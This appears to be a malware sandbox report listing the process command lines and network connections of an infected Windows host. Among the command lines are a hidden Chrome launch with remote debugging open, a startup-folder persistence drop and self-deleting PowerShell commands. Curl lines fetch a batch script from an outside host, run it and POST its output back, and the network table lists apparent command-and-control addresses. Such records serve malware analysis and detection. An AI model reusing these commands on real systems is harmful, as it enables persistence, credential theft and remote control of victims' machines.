"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5196,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5188 /prefetch:8
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\explorer.exe
explorer.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & echo URL="C:\Users\Admin\AppData\Local\TechMesh Dynamics\InnoMesh.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & exit
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5348,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4828 /prefetch:8
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x124,0x128,0x12c,0x120,0xf4,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
\??\c:\windows\resources\svchost.exe
c:\windows\resources\svchost.exe
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0x114,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\cmd.exe
cmd /c type "C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Windows\explorer.exe
explorer.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | gateway.discord.gg | udp |
| US | 162.159.135.234:443 | gateway.discord.gg | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 8.8.8.8:53 | 234.135.159.162.in-addr.arpa | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.102.89.159.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| FR | 194.59.30.220:1336 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 220.30.59.194.in-addr.arpa | udp |
| RS | 79.101.0.33:443 | 79.101.0.33 | tcp |
| US | 8.8.8.8:53 | 33.0.101.79.in-addr.arpa | udp |
| NL | 38.180.123.95:3232 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| CN | 124.221.184.239:5443 | tcp | |
| US | 8.8.8.8:53 | 10.244.41.31.in-addr.arpa | udp |
| FR | 194.59.30.220:1336 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 31.41.244.12:80 | 31.41.244.12 | tcp |
| US | 8.8.8.8:53 | 12.244.41.31.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| US | 162.159.135.234:443 | gateway.discord.gg | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| FR | 142.250.179.67:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 238.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| FR | 142.250.179.67:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 225.74.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 88.221.135.113:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.21.192.23.in-addr.arpa | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 113.135.221.88.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.249.124.192.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 31.41.244.9:80 | 31.41.244.9 | tcp |
| US | 8.8.8.8:53 | 9.244.41.31.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | pinlateofficial.xyz | udp |
| US | 8.8.8.8:53 | pinlateofficial.xyz | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | grahm.xyz | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | jirafasaltas.fun | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 172.67.193.102:443 | jirafasaltas.fun | tcp |
| US | 8.8.8.8:53 | 31.10.203.116.in-addr.arpa | udp |
